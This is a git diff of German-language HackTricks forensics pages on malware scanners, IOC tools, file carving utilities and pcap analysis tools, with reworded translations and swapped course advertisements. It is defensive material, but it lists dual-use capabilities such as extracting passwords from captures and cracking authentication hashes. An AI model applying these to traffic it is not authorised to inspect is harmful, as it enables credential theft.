-#### Updating the Virus Database - -To update the ClamAV virus database, run the following command: - -```bash -sudo freshclam -``` - -This will download the latest virus definitions and keep your system protected against new threats. - -#### Scheduling Scans - -To schedule regular scans with ClamAV, you can use the `cron` utility. Edit the crontab file by running: - -```bash -crontab -e -``` - -Add the following line to schedule a daily scan at 2:00 AM: - -```bash -0 2 * * * clamscan -r /path/to/scan > /dev/null 2>&1 -``` - -Replace `/path/to/scan` with the actual path you want to scan. - -Save the file and exit the editor. The scan will now run automatically at the specified time. ``` sudo apt-get install -y clamav ``` #### Scannen - -Scannen Sie die verdächtige Datei oder den verdächtigen Code mit einem zuverlässigen Antivirenprogramm, um nach bekannten Malware-Signaturen zu suchen. Verwenden Sie auch andere Sicherheitswerkzeuge wie Sandbox-Analysatoren, um das Verhalten der Datei in einer isolierten Umgebung zu überprüfen. ```bash sudo freshclam #Update rules clamscan filepath #Scan 1 file @@ -161,25 +70,25 @@ clamscan folderpath #Scan the whole folder ``` ### [Capa](https://github.com/mandiant/capa) -**Capa** erkennt potenziell schädliche **Fähigkeiten** in ausführbaren Dateien: PE, ELF, .NET. Es findet Dinge wie Att\&ck-Taktiken oder verdächtige Fähigkeiten wie: +**Capa** erkennt potenziell bösartige **Fähigkeiten** in ausführbaren Dateien: PE, ELF, .NET. Es wird Dinge wie Att\&ck-Taktiken oder verdächtige Fähigkeiten wie: * Überprüfung auf OutputDebugString-Fehler * Ausführen als Dienst * Prozess erstellen -Holen Sie es sich im [**Github-Repository**](https://github.com/mandiant/capa). +Holen Sie es sich im [**Github-Repo**](https://github.com/mandiant/capa). ### IOCs -IOC steht für Indicator Of Compromise. Ein IOC ist eine Reihe von **Bedingungen, die** potenziell unerwünschte Software oder bestätigte **Malware identifizieren**. Blue Teams verwenden diese Art von Definition, um nach solchen bösartigen Dateien in ihren Systemen und Netzwerken zu suchen.\ -Das Teilen dieser Definitionen ist sehr nützlich, da andere Blue Teams sie verwenden können, um die Malware schneller zu identifizieren, wenn sie auf einem Computer erkannt wird und ein IOC für diese Malware erstellt wird. +IOC bedeutet Indicator Of Compromise. Ein IOC ist eine Reihe von **Bedingungen, die** einige potenziell unerwünschte Software oder bestätigte **Malware identifizieren**. Blue Teams verwenden diese Art von Definition, um nach solchen bösartigen Dateien in ihren **Systemen** und **Netzwerken** zu suchen.\ +Das Teilen dieser Definitionen ist sehr nützlich, da, wenn Malware auf einem Computer identifiziert wird und ein IOC für diese Malware erstellt wird, andere Blue Teams es verwenden können, um die Malware schneller zu identifizieren. -Ein Tool zum Erstellen oder Ändern von IOCs ist der [**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**.**\ -Sie können Tools wie [**Redline**](https://www.fireeye.com/services/freeware/redline.html) verwenden, um nach definierten IOCs auf einem Gerät zu suchen. +Ein Tool zum Erstellen oder Modifizieren von IOCs ist der [**IOC-Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**.**\ +Sie können Tools wie [**Redline**](https://www.fireeye.com/services/freeware/redline.html) verwenden, um **definierte IOCs auf einem Gerät zu suchen**. ### Loki -[**Loki**](https://github.com/Neo23x0/Loki) ist ein Scanner für einfache Indikatoren für Kompromittierung.\ +[**Loki**](https://github.com/Neo23x0/Loki) ist ein Scanner für einfache Indikatoren für Kompromittierungen.\ Die Erkennung basiert auf vier Erkennungsmethoden: ``` 1. File Name IOC @@ -196,7 +105,7 @@ Compares process connection endpoints with C2 IOCs (new since version v.10) ``` ### Linux Malware Detect -[**Linux Malware Detect (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) ist ein Malware-Scanner für Linux, der unter der GNU GPLv2-Lizenz veröffentlicht wird und speziell für die Bedrohungen in gemeinsam genutzten Hosting-Umgebungen entwickelt wurde. Er verwendet Bedrohungsdaten von Intrusion-Detection-Systemen am Netzwerkrand, um aktiv genutzte Malware bei Angriffen zu erkennen und Signaturen zur Erkennung zu generieren. Darüber hinaus werden Bedrohungsdaten auch aus Benutzereinreichungen mit der LMD-Checkout-Funktion und aus Ressourcen der Malware-Community abgeleitet. +[**Linux Malware Detect (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) ist ein Malware-Scanner für Linux, der unter der GNU GPLv2-Lizenz veröffentlicht wurde und der um die Bedrohungen herum entwickelt wurde, denen man in gemeinsam genutzten Hosting-Umgebungen gegenübersteht. Er verwendet Bedrohungsdaten von Netzwerkrand-Eindringungserkennungssystemen, um Malware zu extrahieren, die aktiv bei Angriffen verwendet wird, und generiert Signaturen zur Erkennung. Darüber hinaus stammen Bedrohungsdaten auch aus Benutzereinreichungen mit der LMD-Checkout-Funktion und aus Malware-Community-Ressourcen. ### rkhunter @@ -206,29 +115,29 @@ sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--sk ``` ### FLOSS -[**FLOSS**](https://github.com/mandiant/flare-floss) ist ein Tool, das versucht, obfuskierte Zeichenketten in ausführbaren Dateien mithilfe verschiedener Techniken zu finden. +[**FLOSS**](https://github.com/mandiant/flare-floss) ist ein Tool, das versucht, obfuskierte Zeichenfolgen in ausführbaren Dateien mithilfe verschiedener Techniken zu finden. ### PEpper -[PEpper](https://github.com/Th3Hurrican3/PEpper) überprüft einige grundlegende Dinge in der ausführbaren Datei (Binärdaten, Entropie, URLs und IPs, einige Yara-Regeln). +[PEpper](https://github.com/Th3Hurrican3/PEpper) überprüft einige grundlegende Dinge innerhalb der ausführbaren Datei (Binärdaten, Entropie, URLs und IPs, einige Yara-Regeln). ### PEstudio -[PEstudio](https://www.winitor.com/download) ist ein Tool, das Informationen über Windows-Executable-Dateien wie Imports, Exports und Header abruft, aber auch VirusTotal überprüft und potenzielle Att\&ck-Techniken findet. +[PEstudio](https://www.winitor.com/download) ist ein Tool, das Informationen über Windows-Executable wie Imports, Exports, Header liefert, aber auch Virus Total überprüft und potenzielle Att\&ck-Techniken findet. ### Detect It Easy(DiE) -[**DiE**](https://github.com/horsicq/Detect-It-Easy/) ist ein Tool, um festzustellen, ob eine Datei **verschlüsselt** ist, und um **Packer** zu finden. +[**DiE**](https://github.com/horsicq/Detect-It-Easy/) ist ein Tool, um festzustellen, ob eine Datei **verschlüsselt** ist und auch **Packer** zu finden. ### NeoPI -[**NeoPI**](https://github.com/CiscoCXSecurity/NeoPI) ist ein Python-Skript, das verschiedene **statistische Methoden** verwendet, um **obfuskierte** und **verschlüsselte** Inhalte in Text-/Skriptdateien zu erkennen. Der beabsichtigte Zweck von NeoPI besteht darin, bei der **Erkennung von verstecktem Webshell-Code** zu helfen. +[**NeoPI**](https://github.com/CiscoCXSecurity/NeoPI) ist ein Python-Skript, das eine Vielzahl von **statistischen Methoden** verwendet, um **obfuskierte** und **verschlüsselte** Inhalte in Text-/Skriptdateien zu erkennen. Der beabsichtigte Zweck von NeoPI besteht darin, bei der **Erkennung von verstecktem Web-Shell-Code** zu helfen. ### **php-malware-finder** -[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) gibt sein Bestes, um **obfuskierten**/**fragwürdigen Code** sowie Dateien zu erkennen, die **PHP**-Funktionen verwenden, die häufig in **Malware**/Webshells verwendet werden. +[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) tut sein Bestes, um **obfuskierten**/**fragwürdigen Code** sowie Dateien zu erkennen, die **PHP**-Funktionen verwenden, die häufig in **Malware**/Webshells verwendet werden. -### Apple-Binärsignaturen +### Apple Binary Signatures Beim Überprüfen einer **Malware-Probe** sollten Sie immer die Signatur der Binärdatei überprüfen, da der **Entwickler**, der sie signiert hat, möglicherweise bereits mit **Malware** in Verbindung gebracht wird. ```bash @@ -243,28 +152,29 @@ spctl --assess --verbose /Applications/Safari.app ``` ## Erkennungstechniken -### Datei-Stacking +### Dateistapelung -Wenn Sie wissen, dass sich in einem Ordner die **Dateien** eines Webservers befinden, die zuletzt am **Datum X aktualisiert wurden**, überprüfen Sie das **Erstellungs- und Änderungsdatum** aller Dateien auf dem Webserver. Wenn ein Datum **verdächtig** ist, überprüfen Sie diese Datei. +Wenn Sie wissen, dass ein bestimmter Ordner, der die **Dateien** eines Webservers enthält, zuletzt am **Datum** aktualisiert wurde. Überprüfen Sie das **Datum**, an dem alle **Dateien** im **Webserver erstellt und geändert** wurden, und wenn ein Datum **verdächtig** ist, überprüfen Sie diese Datei. ### Baselines -Wenn die Dateien eines Ordners **nicht geändert worden sein sollten**, können Sie den **Hash-Wert** der **ursprünglichen Dateien** des Ordners berechnen und mit den **aktuellen Dateien** vergleichen. Alles, was geändert wurde, ist **verdächtig**. +Wenn die Dateien eines Ordners **nicht geändert worden sein sollten**, können Sie den **Hash-Wert** der **ursprünglichen Dateien** des Ordners berechnen und sie mit den **aktuellen** vergleichen. Alles, was geändert wurde, wird **verdächtig** sein. ### Statistische Analyse -Wenn die Informationen in Protokollen gespeichert sind, können Sie **Statistiken über die Anzahl der Zugriffe auf jede Datei eines Webservers überprüfen**, da eine Webshell eine der häufigsten sein könnte. +Wenn die Informationen in Protokollen gespeichert sind, können Sie **Statistiken überprüfen, wie oft auf jede Datei eines Webservers zugegriffen wurde, da eine Webshell eine der häufigsten** sein könnte. + +{% hint style="success" %} +Lernen und üben Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen und üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) **bei oder folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) **und** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **GitHub-Repositories senden.** +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories einreichen.
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md index 3bfb571de..471c6fbc0 100644 --- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md +++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md @@ -1,28 +1,29 @@ +{% hint style="success" %} +Lernen Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys senden.
+{% endhint %} # Carving-Tools ## Autopsy -Das am häufigsten verwendete Tool in der Forensik zur Extraktion von Dateien aus Abbildungen ist [**Autopsy**](https://www.autopsy.com/download/). Laden Sie es herunter, installieren Sie es und lassen Sie es die Datei einlesen, um "versteckte" Dateien zu finden. Beachten Sie, dass Autopsy für die Unterstützung von Festplattenabbildern und anderen Arten von Abbildungen entwickelt wurde, nicht jedoch für einfache Dateien. +Das am häufigsten verwendete Tool in der Forensik zum Extrahieren von Dateien aus Abbildern ist [**Autopsy**](https://www.autopsy.com/download/). Laden Sie es herunter, installieren Sie es und lassen Sie es die Datei analysieren, um "versteckte" Dateien zu finden. Beachten Sie, dass Autopsy darauf ausgelegt ist, Festplattenabbilder und andere Arten von Abbildern zu unterstützen, jedoch nicht einfache Dateien. ## Binwalk -**Binwalk** ist ein Tool zum Suchen von Binärdateien wie Abbildungen und Audiodateien nach eingebetteten Dateien und Daten. -Es kann mit `apt` installiert werden, jedoch befindet sich die [Quelle](https://github.com/ReFirmLabs/binwalk) auf GitHub. +**Binwalk** ist ein Tool zum Durchsuchen binärer Dateien wie Bilder und Audiodateien nach eingebetteten Dateien und Daten. +Es kann mit `apt` installiert werden, jedoch befindet sich die [Quelle](https://github.com/ReFirmLabs/binwalk) auf Github. **Nützliche Befehle**: ```bash sudo apt install binwalk #Insllation @@ -32,7 +33,7 @@ binwalk --dd ".*" file #Displays and extracts all files from the given file ``` ## Foremost -Ein weiteres gängiges Tool zum Auffinden versteckter Dateien ist **foremost**. Die Konfigurationsdatei von foremost befindet sich in `/etc/foremost.conf`. Wenn Sie nur nach bestimmten Dateien suchen möchten, entfernen Sie die Kommentarzeichen. Wenn Sie nichts kommentieren, sucht foremost nach den standardmäßig konfigurierten Dateitypen. +Ein weiteres gängiges Tool zum Auffinden versteckter Dateien ist **foremost**. Sie können die Konfigurationsdatei von foremost in `/etc/foremost.conf` finden. Wenn Sie nur nach bestimmten Dateien suchen möchten, kommentieren Sie sie aus. Wenn Sie nichts auskommentieren, sucht foremost nach den standardmäßig konfigurierten Dateitypen. ```bash sudo apt-get install foremost foremost -v -i file.img -o output @@ -40,7 +41,7 @@ foremost -v -i file.img -o output ``` ## **Scalpel** -**Scalpel** ist ein weiteres Tool, das verwendet werden kann, um **in einer Datei eingebettete Dateien** zu finden und extrahieren. In diesem Fall müssen Sie die Dateitypen, die Sie extrahieren möchten, aus der Konfigurationsdatei \(_/etc/scalpel/scalpel.conf_\) auskommentieren. +**Scalpel** ist ein weiteres Tool, das verwendet werden kann, um **Dateien, die in einer Datei eingebettet sind**, zu finden und extrahieren. In diesem Fall müssen Sie die Dateitypen in der Konfigurationsdatei \(_/etc/scalpel/scalpel.conf_\) auskommentieren, die Sie extrahieren möchten. ```bash sudo apt-get install scalpel scalpel file.img -o output @@ -49,17 +50,17 @@ scalpel file.img -o output Dieses Tool ist in Kali enthalten, aber Sie können es hier finden: [https://github.com/simsong/bulk\_extractor](https://github.com/simsong/bulk_extractor) -Dieses Tool kann ein Image scannen und **pcaps extrahieren**, **Netzwerkinformationen (URLs, Domains, IPs, MACs, E-Mails)** und weitere **Dateien**. Sie müssen nur Folgendes tun: +Dieses Tool kann ein Image scannen und wird **pcaps extrahieren**, **Netzwerkinformationen \(URLs, Domains, IPs, MACs, E-Mails\)** und weitere **Dateien**. Sie müssen nur Folgendes tun: ```text bulk_extractor memory.img -o out_folder ``` -Durchsuchen Sie **alle Informationen**, die das Tool gesammelt hat \(Passwörter?\), **analysieren** Sie die **Pakete** \(lesen Sie [**Pcaps-Analyse**](../pcap-inspection/)\), suchen Sie nach **seltsamen Domains** \(Domains im Zusammenhang mit **Malware** oder **nicht existenten**\). +Navigiere durch **alle Informationen**, die das Tool gesammelt hat \(Passwörter?\), **analysiere** die **Pakete** \(siehe [**Pcaps-Analyse**](../pcap-inspection/)\), suche nach **seltsamen Domains** \(Domains, die mit **Malware** oder **nicht existenten** verknüpft sind\). ## PhotoRec -Sie finden es unter [https://www.cgsecurity.org/wiki/TestDisk\_Download](https://www.cgsecurity.org/wiki/TestDisk_Download) +Sie können es unter [https://www.cgsecurity.org/wiki/TestDisk\_Download](https://www.cgsecurity.org/wiki/TestDisk_Download) finden. -Es gibt eine GUI- und eine CLI-Version. Sie können die **Dateitypen** auswählen, nach denen PhotoRec suchen soll. +Es wird mit GUI- und CLI-Version geliefert. Sie können die **Dateitypen** auswählen, nach denen PhotoRec suchen soll. ![](../../../.gitbook/assets/image%20%28524%29.png) @@ -67,27 +68,28 @@ Es gibt eine GUI- und eine CLI-Version. Sie können die **Dateitypen** auswähle ## FindAES -Sucht nach AES-Schlüsseln, indem es nach ihren Schlüsselplänen sucht. Kann 128, 192 und 256-Bit-Schlüssel finden, wie sie von TrueCrypt und BitLocker verwendet werden. +Sucht nach AES-Schlüsseln, indem es nach deren Schlüsselplänen sucht. Kann 128, 192 und 256-Bit-Schlüssel finden, wie sie von TrueCrypt und BitLocker verwendet werden. -Hier herunterladen: [here](https://sourceforge.net/projects/findaes/). +Download [hier](https://sourceforge.net/projects/findaes/). # Ergänzende Tools -Sie können [**viu** ](https://github.com/atanunq/viu)verwenden, um Bilder in der Konsole anzuzeigen. +Sie können [**viu** ](https://github.com/atanunq/viu)verwenden, um Bilder aus dem Terminal anzuzeigen. Sie können das Linux-Befehlszeilentool **pdftotext** verwenden, um ein PDF in Text umzuwandeln und es zu lesen. +{% hint style="success" %} +Lernen Sie & üben Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repos senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys einreichen.
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/pcap-inspection/README.md b/forensics/basic-forensic-methodology/pcap-inspection/README.md index 6ad14325e..a31ee81ac 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/README.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/README.md @@ -1,33 +1,34 @@ -# Pcap-Inspektion +# Pcap Inspektion + +{% hint style="success" %} +Lernen Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys senden.
+{% endhint %}
-[**RootedCON**](https://www.rootedcon.com/) ist die relevanteste Cybersicherheitsveranstaltung in **Spanien** und eine der wichtigsten in **Europa**. Mit **der Mission, technisches Wissen zu fördern**, ist dieser Kongress ein brodelnder Treffpunkt für Technologie- und Cybersicherheitsprofis in jeder Disziplin. +[**RootedCON**](https://www.rootedcon.com/) ist das relevanteste Cybersicherheitsereignis in **Spanien** und eines der wichtigsten in **Europa**. Mit **der Mission, technisches Wissen zu fördern**, ist dieser Kongress ein brodelnder Treffpunkt für Technologie- und Cybersicherheitsprofis in jeder Disziplin. {% embed url="https://www.rootedcon.com/" %} {% hint style="info" %} -Eine Anmerkung zu **PCAP** vs **PCAPNG**: Es gibt zwei Versionen des PCAP-Dateiformats; **PCAPNG ist neuer und wird nicht von allen Tools unterstützt**. Möglicherweise müssen Sie eine Datei von PCAPNG in PCAP konvertieren, um mit ihr in anderen Tools arbeiten zu können, z. B. mit Wireshark oder einem anderen kompatiblen Tool. +Eine Anmerkung zu **PCAP** vs **PCAPNG**: Es gibt zwei Versionen des PCAP-Dateiformats; **PCAPNG ist neuer und wird nicht von allen Tools unterstützt**. Möglicherweise müssen Sie eine Datei von PCAPNG in PCAP konvertieren, um mit ihr in anderen Tools arbeiten zu können, indem Sie Wireshark oder ein anderes kompatibles Tool verwenden. {% endhint %} ## Online-Tools für PCAPs -* Wenn der Header Ihrer PCAP **beschädigt** ist, sollten Sie versuchen, ihn mit [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php) zu **reparieren** -* Extrahieren Sie **Informationen** und suchen Sie nach **Malware** in einer PCAP-Datei in [**PacketTotal**](https://packettotal.com) +* Wenn der Header Ihres PCAP **beschädigt** ist, sollten Sie versuchen, ihn mit: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php) zu **reparieren** +* Extrahieren Sie **Informationen** und suchen Sie nach **Malware** in einem PCAP auf [**PacketTotal**](https://packettotal.com) * Suchen Sie nach **bösartiger Aktivität** mit [**www.virustotal.com**](https://www.virustotal.com) und [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com) ## Informationen extrahieren @@ -37,10 +38,10 @@ Die folgenden Tools sind nützlich, um Statistiken, Dateien usw. zu extrahieren. ### Wireshark {% hint style="info" %} -**Wenn Sie eine PCAP analysieren möchten, müssen Sie im Grunde wissen, wie man Wireshark verwendet** +**Wenn Sie ein PCAP analysieren möchten, müssen Sie im Grunde wissen, wie man Wireshark verwendet** {% endhint %} -Einige Wireshark-Tricks finden Sie unter: +Sie finden einige Wireshark-Tricks in: {% content-ref url="wireshark-tricks.md" %} [wireshark-tricks.md](wireshark-tricks.md) @@ -48,7 +49,7 @@ Einige Wireshark-Tricks finden Sie unter: ### Xplico Framework -[**Xplico** ](https://github.com/xplico/xplico)_(nur Linux)_ kann eine PCAP analysieren und Informationen daraus extrahieren. Zum Beispiel extrahiert Xplico aus einer PCAP-Datei jede E-Mail (POP, IMAP und SMTP-Protokolle), alle HTTP-Inhalte, jeden VoIP-Anruf (SIP), FTP, TFTP usw. +[**Xplico** ](https://github.com/xplico/xplico)_(nur Linux)_ kann ein **PCAP analysieren** und Informationen daraus extrahieren. Beispielsweise extrahiert Xplico aus einer PCAP-Datei jede E-Mail (POP, IMAP und SMTP-Protokolle), alle HTTP-Inhalte, jeden VoIP-Anruf (SIP), FTP, TFTP usw. **Installation** ```bash @@ -62,26 +63,26 @@ sudo apt-get install xplico /etc/init.d/apache2 restart /etc/init.d/xplico start ``` -Zugriff auf _**127.0.0.1:9876**_ mit Anmeldeinformationen _**xplico:xplico**_ +Zugriff auf _**127.0.0.1:9876**_ mit Anmeldedaten _**xplico:xplico**_ -Erstellen Sie dann einen **neuen Fall**, erstellen Sie eine **neue Sitzung** innerhalb des Falls und **laden Sie die pcap-Datei hoch**. +Erstellen Sie dann einen **neuen Fall**, erstellen Sie eine **neue Sitzung** im Fall und **laden Sie die pcap-Datei hoch**. ### NetworkMiner -Wie Xplico ist es ein Tool zum **Analysieren und Extrahieren von Objekten aus pcaps**. Es gibt eine kostenlose Edition, die Sie **hier** herunterladen können (https://www.netresec.com/?page=NetworkMiner). Es funktioniert mit **Windows**.\ -Dieses Tool ist auch nützlich, um **weitere analysierte Informationen** aus den Paketen zu erhalten, um schneller herauszufinden, was passiert ist. +Wie Xplico ist es ein Tool zum **Analysieren und Extrahieren von Objekten aus pcaps**. Es gibt eine kostenlose Edition, die Sie [**hier**](https://www.netresec.com/?page=NetworkMiner) herunterladen können. Es funktioniert mit **Windows**.\ +Dieses Tool ist auch nützlich, um **weitere Informationen aus den Paketen analysiert** zu erhalten, um zu wissen, was auf eine **schnellere** Weise passiert ist. ### NetWitness Investigator Sie können [**NetWitness Investigator hier herunterladen**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **(Es funktioniert unter Windows)**.\ -Dies ist ein weiteres nützliches Tool, das die Pakete **analysiert** und die Informationen auf eine nützliche Weise sortiert, um zu **wissen, was drinnen passiert**. +Dies ist ein weiteres nützliches Tool, das **die Pakete analysiert** und die Informationen auf eine nützliche Weise sortiert, um zu wissen, was im Inneren passiert. ### [BruteShark](https://github.com/odedshimon/BruteShark) * Extrahieren und Codieren von Benutzernamen und Passwörtern (HTTP, FTP, Telnet, IMAP, SMTP...) * Extrahieren von Authentifizierungshashes und Knacken mit Hashcat (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...) -* Erstellen eines visuellen Netzwerkdiagramms (Netzwerkknoten und Benutzer) -* Extrahieren von DNS-Anfragen +* Erstellen eines visuellen Netzwerkdiagramms (Netzwerkknoten & Benutzer) +* Extrahieren von DNS-Abfragen * Rekonstruieren aller TCP- und UDP-Sitzungen * Dateischnitzerei @@ -91,13 +92,13 @@ capinfos capture.pcap ``` ### Ngrep -Wenn Sie in der pcap-Datei nach etwas suchen möchten, können Sie **ngrep** verwenden. Hier ist ein Beispiel mit den Hauptfiltern: +Wenn Sie **etwas** in der pcap-Datei **suchen**, können Sie **ngrep** verwenden. Hier ist ein Beispiel für die Verwendung der Hauptfilter: ```bash ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192.168 and src host 192.168" ``` -### Carving +### Schnitzen -Die Verwendung gängiger Carving-Techniken kann nützlich sein, um Dateien und Informationen aus dem pcap zu extrahieren: +Die Verwendung gängiger Schnitztechniken kann nützlich sein, um Dateien und Informationen aus dem pcap zu extrahieren: {% content-ref url="../partitions-file-systems-carving/file-data-carving-recovery-tools.md" %} 